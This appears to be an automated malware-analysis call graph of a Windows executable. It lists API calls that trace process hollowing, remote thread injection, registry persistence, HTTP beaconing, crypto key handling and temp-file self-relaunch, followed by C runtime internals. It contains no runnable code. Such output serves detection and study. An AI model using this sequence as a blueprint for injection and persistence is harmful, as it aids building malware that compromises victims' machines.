11748 13f9deb 11747->11748 11767 13f9f70 11748->11767 11752 13f9f0c WideCharToMultiByte lstrcpynA 11753 13f9f50 CoTaskMemFree 11752->11753 11753->11744 11755 13f579d lstrcpyA 11754->11755 11756 13f5ce7 lstrlenA 11754->11756 11755->11503 11756->11755 11757 13f5cfa CreateFileA 11756->11757 11757->11755 11758 13f5d23 GetFileSize 11757->11758 11759 13f5d9f FindCloseChangeNotification 11758->11759 11760 13f5d38 VirtualAlloc 11758->11760 11759->11755 11760->11759 11761 13f5d54 ReadFile 11760->11761 11762 13f5d8e VirtualFree 11761->11762 11763 13f5d7b 11761->11763 11762->11759 11763->11762 11765 13f92bd GetCurrentProcess 11764->11765 11766 13f9215 11764->11766 11765->11766 11766->11707 11766->11708 11768 13f9e2d StringFromCLSID 11767->11768 11769 13f9f87 11767->11769 11768->11752 11768->11753 11769->11768 11775 13f97a0 GetProcessHeap RtlAllocateHeap 11769->11775 11771 13f9fb2 11771->11768 11772 13f9fc8 GetAdaptersInfo 11771->11772 11774 13f9ff4 11772->11774 11776 13f97c0 11774->11776 11775->11771 11777 13f97dc 11776->11777 11778 13f97c9 GetProcessHeap HeapFree 11776->11778 11777->11768 11778->11777 11780 13f59f3 11779->11780 11782 13f5949 11779->11782 11780->11518 11781 13f59de CharUpperA 11781->11782 11782->11780 11782->11781 11784 13f8ce7 11783->11784 11785 13f8bc7 11783->11785 11784->11528 11785->11784 11786 13f8be5 CryptAcquireContextA 11785->11786 11787 13f8c3e 11786->11787 11788 13f8c09 GetLastError 11786->11788 11787->11784 11791 13f8c48 CryptCreateHash 11787->11791 11789 13f8c1b 11788->11789 11790 13f8c24 CryptAcquireContextA 11788->11790 11789->11787 11789->11790 11790->11787 11792 13f8cdb CryptReleaseContext 11791->11792 11793 13f8c63 CryptHashData 11791->11793 11792->11784 11794 13f8c7b CryptGetHashParam 11793->11794 11795 13f8cd1 CryptDestroyHash 11793->11795 11794->11795 11796 13f8ca3 11794->11796 11795->11792 11796->11795 11797 13f8cab CryptGetHashParam 11796->11797 11797->11795 11798 13f8ccb 11797->11798 11798->11795 11800 13f9667 11799->11800 11801 13f9722 11799->11801 11800->11801 11802 13f9685 lstrlenA 11800->11802 11801->11528 11806 13f9699 11802->11806 11803 13f96fd lstrlenA 11804 13f970c 11803->11804 11805 13f9715 lstrlenA 11803->11805 11804->11805 11805->11801 11806->11803 11807 13f96d4 lstrcatA lstrlenA 11806->11807 11807->11806 11808->11556 11810 13f12fc 11809->11810 11811 13f12e6 11809->11811 11811->11810 11812 13f131d RegOpenKeyExA 11811->11812 11813 13f1378 Sleep 11812->11813 11814 13f1341 lstrlenA RegSetValueExA RegCloseKey 11812->11814 11813->11811 11814->11813 11816 13f5ef6 RegSetValueExA 11815->11816 11817 13f9bda 11815->11817 11816->11566 11817->11816 11818 13f9b90 QueryPerformanceCounter 11817->11818 11818->11817 11820 13f5f58 lstrcpyA lstrcatA 11819->11820 11820->11581 11820->11582 11822 13f79d2 11821->11822 11823 13fa417 11821->11823 11822->11625 11822->11626 11823->11822 11824 13fa442 RegOpenKeyExA 11823->11824 11824->11822 11825 13fa466 RegQueryValueExA 11824->11825 11826 13fa48a 11825->11826 11827 13fa490 RegCloseKey 11825->11827 11826->11827 11827->11822 11829 13f92fa 11828->11829 11830 13f93f8 11828->11830 11829->11830 11831 13f9304 GetLocalTime 11829->11831 11830->11640 11833 13f9322 11831->11833 11832 13f8bb0 9 API calls 11832->11833 11833->11830 11833->11832 11834 13f9650 5 API calls 11833->11834 11835 13f93c9 lstrcatA 11834->11835 11835->11833 11836->11656 11838 13f4b96 11837->11838 11839 13f4ad6 CoInitialize 11837->11839 11840 13f4ade 11839->11840 11841 13f4aeb WaitForSingleObject 11840->11841 11842 13f4b80 Sleep 11840->11842 11841->11842 11843 13f4b01 EnterCriticalSection 11841->11843 11842->11840 11903 13f8250 11843->11903 11846 13f4b50 11908 13f62b0 11846->11908 11849 13f4b90 CoUninitialize 11849->11838 11851 13f4bc2 11850->11851 11852 13f56f0 CoUninitialize 11850->11852 11853 13f4bd1 SetEvent 11851->11853 11854 13f4bf9 11853->11854 11854->11852 11855 13f4c28 VirtualAlloc VirtualAlloc VirtualAlloc 11854->11855 11856 13f4c10 WaitForSingleObject 11854->11856 11857 13f4c23 11855->11857 11858 13f4c8a 11855->11858 11856->11855 11856->11857 11857->11852 11858->11857 11862 13f52a2 11858->11862 11863 13f4cc3 11858->11863 11861 13f4ce5 12185 13f8370 11862->12185 11863->11861 11866 13f4e2c 11863->11866 11867 13f4db7 GetCurrentThreadId 11863->11867 11864 13f56b8 VirtualFree VirtualFree VirtualFree 11864->11857 11865 13f5354 lstrlenA lstrlenA 11865->11864 11868 13f5385 wsprintfA CryptBinaryToStringA 11865->11868 11866->11861 11871 13f4ee1 11866->11871 11872 13f4e81 GetSystemMetrics GetSystemMetrics 11866->11872 11867->11861 11868->11864 11869 13f53d0 MultiByteToWideChar 11868->11869 12204 13f17d0 11869->12204 11873 13f4ef0 GlobalMemoryStatus 11871->11873 11876 13f4f40 11871->11876 11872->11861 11873->11861 11874 13f569b 11874->11864 11875 13f56a4 VirtualFree 11874->11875 11875->11864 11876->11861 11880 13f4fdf lstrlenA 11876->11880 11881 13f5032 11876->11881 11878 13f551b 11878->11874 11885 13f552c EnterCriticalSection 11878->11885 11879 13f547d VirtualFree 11884 13f54b1 11879->11884 11880->11861 11882 13f5096 11881->11882 11883 13f5041 lstrlenA 11881->11883 11888 13f50a5 lstrlenA 11882->11888 11889 13f5104 11882->11889 11883->11861 11884->11878 11895 13f17d0 16 API calls 11884->11895 11886 13f558c VirtualAlloc 11885->11886 11887 13f5542 VirtualAlloc 11885->11887 11893 13f568e LeaveCriticalSection 11886->11893 11894 13f55c7 GetTickCount 11886->11894 11890 13f5578 11887->11890 11888->11861 11891 13f5113 lstrlenA 11889->11891 11892 13f5172 11889->11892 11890->11893 11891->11861 11896 13f5181 lstrlenA 11892->11896 11897 13f51e0 11892->11897 11893->11874 11901 13f55da 11894->11901 11895->11884 11896->11861 11898 13f523f 11897->11898 11899 13f51ef lstrlenA 11897->11899 11898->11861 11900 13f9b90 QueryPerformanceCounter 11898->11900 11899->11861 11900->11861 11902 13f565c VirtualFree 11901->11902 11902->11893 11904 13f4b37 LeaveCriticalSection 11903->11904 11907 13f8267 11903->11907 11904->11842 11904->11846 11905 13f82e7 StrStrA 11905->11904 11905->11907 11907->11904 11907->11905 11993 13f8090 11907->11993 11909 13f4b5d VirtualFree SetEvent 11908->11909 11910 13f62ca 11908->11910 11909->11849 11910->11909 11911 13f6427 11910->11911 11914 13f6399 11910->11914 11911->11909 11912 13f64ba GetEnvironmentVariableA 11911->11912 11922 13f65f3 11911->11922 11917 13f64e1 11912->11917 11913 13f65fe 11913->11913 11915 13f63a4 VirtualAlloc 11914->11915 11916 13f6410 11914->11916 11919 13f640e 11915->11919 11929 13f63cc 11915->11929 11921 13f1ee0 5 API calls 11916->11921 12015 13f9730 11917->12015 11918 13f6bdd 11920 13f6c13 11918->11920 12089 13fa360 11918->12089 11919->11911 11921->11919 11922->11913 11922->11918 12054 13f7250 11922->12054 11928 13f63fd VirtualFree 11928->11919 11929->11928 12012 13f1ee0 CreateThread 11929->12012 11930 13f6552 WriteFile 11934 13f65dd 11930->11934 11935 13f6588 11930->11935 11931 13f6654 VirtualAlloc 11932 13f6752 11931->11932 11936 13f667a 11931->11936 11939 13f69ba GetEnvironmentVariableA 11932->11939 11942 13f678e VirtualAlloc 11932->11942 11943 13f6858 11932->11943 11934->11922 11937 13f65e6 CloseHandle 11934->11937 11935->11934 11940 13f6593 CloseHandle 11935->11940 12066 13f97a0 GetProcessHeap RtlAllocateHeap 11936->12066 11937->11922 11941 13f69e1 11939->11941 12019 13f6c60 11940->12019 11949 13f9730 QueryPerformanceCounter 11941->11949 11946 13f6856 11942->11946 11960 13f67c6 11942->11960 11945 13f2070 32 API calls 11943->11945 11945->11946 11954 13f69a6 11946->11954 11958 13f6894 11946->11958 11959 13f6880 11946->11959 11952 13f69f2 GetTickCount GetTempFileNameA CreateFileA 11949->11952 11957 13f6a4f 11952->11957 11992 13f6bbd 11952->11992 11953 13f6698 CreateThread CloseHandle 11953->11932 12123 13f6da0 11953->12123 11954->11939 11955 13f65c9 12031 13f74a0 11955->12031 11956 13f65d8 11956->11934 11965 13f6cf0 4 API calls 11956->11965 11966 13f6b1e WriteFile 11957->11966 11967 13f6a7b VirtualAlloc 11957->11967 11962 13f698a 11958->11962 12077 13f97a0 GetProcessHeap RtlAllocateHeap 11958->12077 12070 13f73c0 11959->12070 11961 13f6842 VirtualFree 11960->11961 12067 13f2070 11960->12067 11961->11946 11962->11954 12078 13f2510 11962->12078 11965->11934 11973 13f6b1c 11966->11973 11972 13f6aaf 11967->11972 11967->11973 11985 13f6b08 VirtualFree 11972->11985 11986 13f6ad2 WriteFile 11972->11986 11975 13f6bc9 CloseHandle 11973->11975 11979 13f6b59 CloseHandle 11973->11979 11975->11992 11976 13f68aa 11980 13f68ca 11976->11980 11981 13f68e9 VirtualAlloc 11976->11981 11977 13f6809 VirtualAlloc 11982 13f683f 11977->11982 11983 13f1e60 2 API calls 11979->11983 11980->11962 11988 13f693f CreateThread CloseHandle 11980->11988 11981->11980 11984 13f690f 11981->11984 11982->11961 11987 13f6b72 11983->11987 11984->11980 11985->11973 11986->11985 11989 13f6b9e 11987->11989 11990 13f73c0 5 API calls 11987->11990 11987->11992 11988->11962 12166 13f77b0 11988->12166 11991 13f2510 8 API calls 11989->11991 11989->11992 11990->11989 11991->11992 11992->11918 11994 13f80a7 11993->11994 11995 13f8246 11993->11995 11994->11995 11996 13f80c5 VirtualAlloc 11994->11996 11995->11907 11996->11995 11997 13f80eb 11996->11997 12005 13f1390 11997->12005 11999 13f8235 VirtualFree 11999->11995 12000 13f8100 12001 13f8a70 9 API calls 12000->12001 12004 13f8204 12000->12004 12002 13f81dd 12001->12002 12003 13f81e4 VirtualAlloc 12002->12003 12002->12004 12003->12004 12004->11995 12004->11999 12006 13f13ae 12005->12006 12007 13f139c 12005->12007 12006->12000 12007->12006 12008 13f13b6 GetProcessHeap RtlAllocateHeap 12007->12008 12008->12006 12009 13f13e4 12008->12009 12010 13f14e4 GetProcessHeap RtlFreeHeap 12009->12010 12011 13f1498 GetProcessHeap HeapFree 12009->12011 12010->12006 12011->12006 12013 13f1f0a WaitForSingleObject 12012->12013 12014 13f1f21 12012->12014 12094 13f1f30 12012->12094 12013->12014 12014->11928 12016 13f64f2 GetTickCount GetTempFileNameA CreateFileA 12015->12016 12018 13f9743 12015->12018 12016->11922 12016->11930 12017 13f9763 QueryPerformanceCounter 12017->12018 12018->12016 12018->12017 12020 13f6c7c 12019->12020 12021 13f6c83 RegOpenKeyExA 12019->12021 12020->12021 12022 13f6ca7 12021->12022 12023 13f65ab 12021->12023 12024 13f9b90 QueryPerformanceCounter 12022->12024 12026 13f1e60 12023->12026 12025 13f6cae RegSetValueExA RegCloseKey 12024->12025 12025->12023 12027 13f1ece 12026->12027 12028 13f1e73 12026->12028 12027->11955 12027->11956 12029 13f1e90 CreateProcessA 12028->12029 12029->12027 12030 13f1ebe CloseHandle 12029->12030 12030->12027 12032 13f74bc 12031->12032 12033 13f74d2 Sleep 12032->12033 12034 13f750b 12033->12034 12035 13f74f5 GetModuleFileNameA 12033->12035 12037 13f7536 GetEnvironmentVariableA 12034->12037 12038 13f7520 GetAllUsersProfileDirectoryA 12034->12038 12036 13f7583 SetFileAttributesA wnsprintfA 12035->12036 12040 13f75c6 TerminateThread 12036->12040 12041 13f75d4 RegOpenKeyExA 12036->12041 12039 13f754d lstrcatA lstrcatA lstrcatA 12037->12039 12038->12039 12039->12036 12040->12041 12043 13f762a RegDeleteValueA RegCloseKey 12041->12043 12044 13f7649 12041->12044 12043->12044 12045 13f765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 12044->12045 12048 13f5e30 6 API calls 12044->12048 12046 13f76df lstrlenA WriteFile CloseHandle 12045->12046 12047 13f65ce ExitProcess 12045->12047 12049 13f7731 12046->12049 12050 13f765b 12048->12050 12051 13f7744 CreateProcessA 12049->12051 12050->12045 12052 13f7796 CloseHandle 12051->12052 12053 13f77a3 ExitProcess 12051->12053 12052->12053 12055 13f6638 12054->12055 12056 13f7264 12054->12056 12055->11931 12055->11932 12056->12055 12057 13f72ad wsprintfA 12056->12057 12058 13f72df RegOpenKeyExA 12057->12058 12059 13f72d8 12057->12059 12058->12055 12060 13f7307 RegQueryValueExA 12058->12060 12059->12058 12061 13f73a5 RegCloseKey 12060->12061 12062 13f7333 12060->12062 12061->12055 12062->12061 12063 13f7339 GetLocalTime 12062->12063 12100 13f9910 SystemTimeToFileTime SystemTimeToFileTime 12063->12100 12065 13f7388 12065->12061 12066->11953 12102 13f20b0 12067->12102 12071 13f6891 12070->12071 12072 13f73d0 12070->12072 12071->11958 12072->12071 12073 13f7419 wsprintfA 12072->12073 12074 13f744b RegOpenKeyExA 12073->12074 12075 13f7444 12073->12075 12074->12071 12076 13f746f GetLocalTime RegSetValueExA RegCloseKey 12074->12076 12075->12074 12076->12071 12077->11976 12079 13f2527 12078->12079 12080 13f2573 12078->12080 12079->12080 12081 13f2531 VirtualAlloc 12079->12081 12080->11954 12081->12080 12082 13f257a VirtualAllocEx 12081->12082 12083 13f259f VirtualAllocEx 12082->12083 12084 13f25d7 12082->12084 12083->12084 12085 13f25bf VirtualFree 12083->12085 12086 13f2653 WriteProcessMemory 12084->12086 12085->12080 12087 13f2687 VirtualFree CreateRemoteThread 12086->12087 12088 13f2672 VirtualFree 12086->12088 12087->12080 12088->12080 12090 13fa3ed 12089->12090 12091 13fa370 12089->12091 12090->11920 12091->12090 12092 13fa39b RegOpenKeyExA 12091->12092 12092->12090 12093 13fa3bf RegSetValueExA RegCloseKey 12092->12093 12093->12090 12095 13f1f50 VirtualAlloc 12094->12095 12099 13f203f 12094->12099 12096 13f1f97 VirtualAlloc 12095->12096 12097 13f1fad 12095->12097 12096->12097 12098 13f2ed0 GetPEB 12097->12098 12097->12099 12098->12099 12101 13f996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 12100->12101 12101->12065 12103 13f20c3 GetEnvironmentVariableA lstrcatA 12102->12103 12104 13f2080 12102->12104 12105 13f20f2 lstrcatA lstrcatA 12103->12105 12106 13f2115 12103->12106 12104->11961 12104->11977 12105->12106 12107 13f2138 VirtualAlloc 12106->12107 12107->12104 12108 13f219d CreateProcessA 12107->12108 12109 13f21ca VirtualFree 12108->12109 12110 13f21e2 VirtualAllocEx 12108->12110 12109->12104 12111 13f2213 VirtualAllocEx 12110->12111 12113 13f227d 12110->12113 12112 13f223c TerminateProcess CloseHandle CloseHandle VirtualFree 12111->12112 12111->12113 12112->12104 12114 13f237b WriteProcessMemory 12113->12114 12115 13f23e1 VirtualFree Wow64GetThreadContext 12114->12115 12116 13f23a0 TerminateProcess CloseHandle CloseHandle VirtualFree 12114->12116 12117 13f2444 WriteProcessMemory 12115->12117 12118 13f2414 TerminateProcess CloseHandle CloseHandle 12115->12118 12116->12104 12119 13f246a TerminateProcess CloseHandle CloseHandle 12117->12119 12120 13f2497 Wow64SetThreadContext 12117->12120 12118->12104 12119->12104 12121 13f24d9 TerminateProcess CloseHandle CloseHandle 12120->12121 12122 13f24c4 ResumeThread 12120->12122 12121->12104 12122->12104 12124 13f723f 12123->12124 12125 13f6db9 Sleep CoInitialize 12123->12125 12126 13f6e1b 12125->12126 12127 13f7017 GetEnvironmentVariableA 12125->12127 12129 13f6e3f VirtualAlloc 12126->12129 12130 13f6ee5 12126->12130 12128 13f703e 12127->12128 12132 13f9730 QueryPerformanceCounter 12128->12132 12134 13f6e6e 12129->12134 12138 13f6ee3 12129->12138 12131 13f2070 32 API calls 12130->12131 12131->12138 12133 13f704f GetTickCount GetTempFileNameA CreateFileA 12132->12133 12136 13f7239 CoUninitialize 12133->12136 12137 13f70ac 12133->12137 12135 13f6ed2 VirtualFree 12134->12135 12140 13f2070 32 API calls 12134->12140 12135->12138 12136->12124 12142 13f718b WriteFile 12137->12142 12143 13f70db VirtualAlloc 12137->12143 12139 13f6f21 12138->12139 12144 13f73c0 5 API calls 12138->12144 12156 13f700f 12138->12156 12141 13f6ff6 12139->12141 12184 13f97a0 GetProcessHeap RtlAllocateHeap 12139->12184 12145 13f6e97 12140->12145 12153 13f2510 8 API calls 12141->12153 12141->12156 12149 13f71b5 CloseHandle 12142->12149 12147 13f7189 12143->12147 12148 13f7116 12143->12148 12144->12139 12145->12135 12151 13f6ea8 VirtualAlloc 12145->12151 12147->12149 12159 13f713f WriteFile 12148->12159 12160 13f7175 VirtualFree 12148->12160 12149->12136 12150 13f71cb 12149->12150 12150->12136 12157 13f1e60 2 API calls 12150->12157 12154 13f6ecf 12151->12154 12152 13f6f3a 12155 13f6f6a VirtualAlloc 12152->12155 12158 13f6f57 12152->12158 12153->12156 12154->12135 12155->12158 12156->12136 12161 13f71e5 12157->12161 12158->12141 12162 13f6fbd CreateThread CloseHandle 12158->12162 12159->12160 12160->12147 12161->12136 12163 13f73c0 5 API calls 12161->12163 12164 13f7217 12161->12164 12162->12141 12163->12164 12164->12136 12165 13f2510 8 API calls 12164->12165 12165->12156 12167 13f78c3 12166->12167 12168 13f77c0 CoInitialize 12166->12168 12169 13f78bd CoUninitialize 12168->12169 12170 13f77e8 12168->12170 12169->12167 12171 13f77fc GetExitCodeProcess 12170->12171 12172 13f7898 VirtualFree 12170->12172 12173 13f7818 12171->12173 12178 13f788f 12171->12178 12174 13f97c0 2 API calls 12172->12174 12175 13f782e CloseHandle Sleep 12173->12175 12176 13f7821 Sleep 12173->12176 12177 13f78ba 12174->12177 12179 13f2070 32 API calls 12175->12179 12176->12178 12177->12169 12178->12172 12180 13f7851 12179->12180 12180->12178 12181 13f7863 12180->12181 12182 13f2510 8 API calls 12180->12182 12181->12172 12183 13f788c 12182->12183 12183->12178 12184->12152 12186 13f5344 12185->12186 12187 13f8387 12185->12187 12186->11864 12186->11865 12187->12186 12188 13f83b1 VirtualAlloc VirtualAlloc 12187->12188 12189 13f83e9 12188->12189 12190 13f8592 12188->12190 12189->12190 12208 13f8800 12189->12208 12191 13f85a9 12190->12191 12192 13f8598 VirtualFree 12190->12192 12191->12186 12194 13f85af VirtualFree 12191->12194 12192->12191 12194->12186 12200 13f847e 12230 13f8970 12200->12230 12202 13f8581 VirtualFree 12202->12190 12203 13f84ad 12203->12202 12205 13f17e1 12204->12205 12207 13f181e 12204->12207 12205->12207 12241 13f1840 12205->12241 12207->11874 12207->11878 12207->11879 12209 13f8420 12208->12209 12210 13f8817 12208->12210 12209->12190 12224 13f8770 12209->12224 12210->12209 12211 13f8821 CryptAcquireContextA 12210->12211 12212 13f887a 12211->12212 12213 13f8845 GetLastError 12211->12213 12212->12209 12216 13f8884 CryptGenKey 12212->12216 12214 13f8857 12213->12214 12215 13f8860 CryptAcquireContextA 12213->12215 12214->12212 12214->12215 12215->12212 12217 13f88bd CryptExportKey 12216->12217 12218 13f8950 CryptReleaseContext 12216->12218 12219 13f8946 CryptDestroyKey 12217->12219 12220 13f88d9 12217->12220 12218->12209 12219->12218 12221 13f88f1 CryptImportKey 12220->12221 12222 13f893d 12220->12222 12221->12222 12223 13f8916 CryptExportKey CryptDestroyKey 12221->12223 12222->12219 12223->12222 12225 13f87d0 QueryPerformanceCounter 12224->12225 12226 13f844b 12225->12226 12227 13f87d0 12226->12227 12228 13f8458 VirtualAlloc 12227->12228 12229 13f87e3 QueryPerformanceCounter 12227->12229 12228->12190 12228->12200 12229->12228 12231 13f8987 12230->12231 12232 13f8a60 12230->12232 12231->12232 12233 13f89a5 CryptAcquireContextA 12231->12233 12232->12203 12234 13f89fe 12233->12234 12235 13f89c9 GetLastError 12233->12235 12234->12232 12238 13f8a04 CryptImportKey 12234->12238 12236 13f89db 12235->12236 12237 13f89e4 CryptAcquireContextA 12235->12237 12236->12234 12236->12237 12237->12234 12239 13f8a29 CryptEncrypt CryptDestroyKey 12238->12239 12240 13f8a54 CryptReleaseContext 12238->12240 12239->12240 12240->12232 12242 13f1c95 12241->12242 12243 13f185a 12241->12243 12242->12207 12243->12242 12244 13f18ba InternetCrackUrlA 12243->12244 12244->12242 12245 13f1910 InternetOpenA 12244->12245 12245->12242 12246 13f1936 InternetConnectA 12245->12246 12247 13f196f HttpOpenRequestA 12246->12247 12248 13f1c88 InternetCloseHandle 12246->12248 12249 13f19ad wnsprintfA HttpAddRequestHeadersA 12247->12249 12250 13f1c7b InternetCloseHandle 12247->12250 12248->12242 12251 13f1c6e InternetCloseHandle 12249->12251 12252 13f19eb InternetSetOptionA 12249->12252 12250->12248 12251->12250 12258 13f1a30 12252->12258 12254 13f1a4d HttpSendRequestA 12255 13f1a7b HttpQueryInfoA 12254->12255 12254->12258 12255->12258 12256 13f1adc HttpQueryInfoA 12257 13f1b47 VirtualAlloc 12256->12257 12256->12258 12257->12258 12259 13f1c19 12257->12259 12258->12251 12258->12254 12258->12256 12258->12257 12260 13f1b99 InternetReadFile 12258->12260 12261 13f1c23 InternetReadFile 12259->12261 12260->12258 12261->12258 12261->12261 12263 50397c 12262->12263 12267 503777 12262->12267 12264 503a09 12263->12264 12266 5039bb GetModuleFileNameA GetCurrentActCtx 12263->12266 12265 503ad3 GetNamedPipeInfo DeleteFileA 12264->12265 12269 5038e7 12264->12269 12265->12265 12265->12269 12266->12264 12270 5016c0 12267->12270 12269->11355 12271 501720 12270->12271 12274 5017cb 12270->12274 12272 50172f 12271->12272 12273 5017d5 12271->12273 12279 511542 12272->12279 12273->12274 12276 51049e CreateThread 12273->12276 12274->12269 12276->12274 12280 511596 12279->12280 12281 50178f 12280->12281 12282 51164a GetLastError SetHandleInformation 12280->12282 12283 504f25 12281->12283 12282->12281 12284 504fe3 12283->12284 12286 504f63 12283->12286 12285 510d94 GetNamedPipeHandleStateA 12284->12285 12285->12286 12286->12274 12288 503fb1 12287->12288 12289 503dda 12287->12289 12288->12289 12290 503fc7 GetCurrentDirectoryA 12288->12290 12289->11362 12290->12288 12582 13f2f60 12585 13f3090 GetPEB 12582->12585 12584 13f2f72 12585->12584 10479 508220 10480 508231 10479->10480 10482 50811e 10479->10482 10502 5069e4 GetLastError 10482->10502 10484 50812b 10522 50823d 10484->10522 10486 508133 10531 507eb2 10486->10531 10489 50814a 10489->10480 10492 50818d 10558 5073bc 10492->10558 10496 508188 10555 5062bc 10496->10555 10498 5081d1 10498->10492 10564 507d05 10498->10564 10499 5081a5 10499->10498 10500 5073bc _free 20 API calls 10499->10500 10500->10498 10503 506a00 10502->10503 10504 5069fa 10502->10504 10509 506a4f SetLastError 10503->10509 10574 50735f 10503->10574 10567 5075b9 10504->10567 10508 506a1a 10511 5073bc _free 20 API calls 10508->10511 10509->10484 10513 506a20 10511->10513 10515 506a5b SetLastError 10513->10515 10514 506a36 10588 506856 10514->10588 10593 50731c 10515->10593 10520 5073bc _free 20 API calls 10521 506a48 10520->10521 10521->10509 10521->10515 10523 508249 ___scrt_is_nonwritable_in_current_image 10522->10523 10524 5069e4 pre_c_initialization 35 API calls 10523->10524 10526 508253 10524->10526 10528 5082d7 ___scrt_is_nonwritable_in_current_image 10526->10528 10529 50731c _abort 35 API calls 10526->10529 10530 5073bc _free 20 API calls 10526->10530 10952 507c63 EnterCriticalSection 10526->10952 10953 5082ce 10526->10953 10528->10486 10529->10526 10530->10526 10957 507d2d 10531->10957 10534 507ed3 GetOEMCP 10536 507efc 10534->10536 10535 507ee5 10535->10536 10537 507eea GetACP 10535->10537 10536->10489 10538 509273 10536->10538 10537->10536 10539 5092b1 10538->10539 10543 509281 pre_c_initialization 10538->10543 10540 5062bc _free 20 API calls 10539->10540 10542 50815b 10540->10542 10541 50929c RtlAllocateHeap 10541->10542 10541->10543 10542->10492 10545 5082df 10542->10545 10543->10539 10543->10541 10544 508e0f pre_c_initialization 7 API calls 10543->10544 10544->10543 10546 507eb2 37 API calls 10545->10546 10547 5082fe 10546->10547 10550 50834f IsValidCodePage 10547->10550 10552 508305 10547->10552 10554 508374 ___scrt_get_show_window_mode 10547->10554 10548 50a183 _ValidateLocalCookies 5 API calls 10549 508180 10548->10549 10549->10496 10549->10499 10551 508361 GetCPInfo 10550->10551 10550->10552 10551->10552 10551->10554 10552->10548 10994 507f8a GetCPInfo 10554->10994 10556 506a68 _free 20 API calls 10555->10556 10557 5062c1 10556->10557 10557->10492 10559 5073f0 _free 10558->10559 10560 5073c7 HeapFree 10558->10560 10559->10489 10560->10559 10561 5073dc 10560->10561 10562 5062bc _free 18 API calls 10561->10562 10563 5073e2 GetLastError 10562->10563 10563->10559 11070 507cc2 10564->11070 10566 507d29 10566->10492 10604 5073f6 10567->10604 10570 5075f8 TlsGetValue 10571 5075ec 10570->10571 10611 50a183 10571->10611 10573 507609 10573->10503 10579 50736c pre_c_initialization 10574->10579 10575 5073ac 10578 5062bc _free 19 API calls 10575->10578 10576 507397 RtlAllocateHeap 10577 506a12 10576->10577 10576->10579 10577->10508 10581 50760f 10577->10581 10578->10577 10579->10575 10579->10576 10626 508e0f 10579->10626 10582 5073f6 pre_c_initialization 5 API calls 10581->10582 10583 507636 10582->10583 10584 507651 TlsSetValue 10583->10584 10587 507645 10583->10587 10584->10587 10585 50a183 _ValidateLocalCookies 5 API calls 10586 506a2f 10585->10586 10586->10508 10586->10514 10587->10585 10642 50682e 10588->10642 10790 508b98 10593->10790 10596 50732c 10598 507336 IsProcessorFeaturePresent 10596->10598 10599 507354 10596->10599 10601 507341 10598->10601 10824 508a48 10599->10824 10818 506465 10601->10818 10605 507426 10604->10605 10608 507422 10604->10608 10605->10570 10605->10571 10606 507446 10606->10605 10609 507452 GetProcAddress 10606->10609 10608->10605 10608->10606 10618 507492 10608->10618 10610 507462 try_get_function 10609->10610 10610->10605 10612 50a18c 10611->10612 10613 50a18e IsProcessorFeaturePresent 10611->10613 10612->10573 10615 50a648 10613->10615 10625 50a60c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10615->10625 10617 50a72b 10617->10573 10619 5074b3 LoadLibraryExW 10618->10619 10623 5074a8 10618->10623 10620 5074d0 GetLastError 10619->10620 10621 5074e8 10619->10621 10620->10621 10622 5074db LoadLibraryExW 10620->10622 10621->10623 10624 5074ff FreeLibrary 10621->10624 10622->10621 10623->10608 10624->10623 10625->10617 10631 508e53 10626->10631 10628 508e25 10629 50a183 _ValidateLocalCookies 5 API calls 10628->10629 10630 508e4f 10629->10630 10630->10579 10632 508e5f ___scrt_is_nonwritable_in_current_image 10631->10632 10637 507c63 EnterCriticalSection 10632->10637 10634 508e6a 10638 508e9c 10634->10638 10636 508e91 ___scrt_is_nonwritable_in_current_image 10636->10628 10637->10634 10641 507cab LeaveCriticalSection 10638->10641 10640 508ea3 10640->10636 10641->10640 10648 50676e 10642->10648 10644 506852 10645 5067de 10644->10645 10659 506672 10645->10659 10647 506802 10647->10520 10649 50677a ___scrt_is_nonwritable_in_current_image 10648->10649 10654 507c63 EnterCriticalSection 10649->10654 10651 506784 10655 5067aa 10651->10655 10653 5067a2 ___scrt_is_nonwritable_in_current_image 10653->10644 10654->10651 10658 507cab LeaveCriticalSection 10655->10658 10657 5067b4 10657->10653 10658->10657 10660 50667e ___scrt_is_nonwritable_in_current_image 10659->10660 10667 507c63 EnterCriticalSection 10660->10667 10662 506688 10668 506999 10662->10668 10664 5066a0 10672 5066b6 10664->10672 10666 5066ae ___scrt_is_nonwritable_in_current_image 10666->10647 10667->10662 10669 5069cf __fassign 10668->10669 10670 5069a8 __fassign 10668->10670 10669->10664 10670->10669 10675 50790e 10670->10675 10789 507cab LeaveCriticalSection 10672->10789 10674 5066c0 10674->10666 10676 50798e 10675->10676 10679 507924 10675->10679 10678 5073bc _free 20 API calls 10676->10678 10701 5079dc 10676->10701 10680 5079b0 10678->10680 10679->10676 10683 5073bc _free 20 API calls 10679->10683 10685 507957 10679->10685 10681 5073bc _free 20 API calls 10680->10681 10684 5079c3 10681->10684 10682 5079ea 10687 507a4a 10682->10687 10700 5073bc 20 API calls _free 10682->10700 10688 50794c 10683->10688 10689 5073bc _free 20 API calls 10684->10689 10690 5073bc _free 20 API calls 10685->10690 10702 507979 10685->10702 10686 5073bc _free 20 API calls 10691 507983 10686->10691 10692 5073bc _free 20 API calls 10687->10692 10703 508fdd 10688->10703 10694 5079d1 10689->10694 10695 50796e 10690->10695 10696 5073bc _free 20 API calls 10691->10696 10697 507a50 10692->10697 10698 5073bc _free 20 API calls 10694->10698 10731 5090db 10695->10731 10696->10676 10697->10669 10698->10701 10700->10682 10743 507a81 10701->10743 10702->10686 10704 5090d7 10703->10704 10705 508fee 10703->10705 10704->10685 10706 508fff 10705->10706 10707 5073bc _free 20 API calls 10705->10707 10708 509011 10706->10708 10709 5073bc _free 20 API calls 10706->10709 10707->10706 10710 509023 10708->10710 10711 5073bc _free 20 API calls 10708->10711 10709->10708 10712 509035 10710->10712 10714 5073bc _free 20 API calls 10710->10714 10711->10710 10713 509047 10712->10713 10715 5073bc _free 20 API calls 10712->10715 10716 509059 10713->10716 10717 5073bc _free 20 API calls 10713->10717 10714->10712 10715->10713 10718 50906b 10716->10718 10719 5073bc _free 20 API calls 10716->10719 10717->10716 10720 50907d 10718->10720 10722 5073bc _free 20 API calls 10718->10722 10719->10718 10721 50908f 10720->10721 10723 5073bc _free 20 API calls 10720->10723 10724 5090a1 10721->10724 10725 5073bc _free 20 API calls 10721->10725 10722->10720 10723->10721 10726 5090b3 10724->10726 10727 5073bc _free 20 API calls 10724->10727 10725->10724 10728 5090c5 10726->10728 10729 5073bc _free 20 API calls 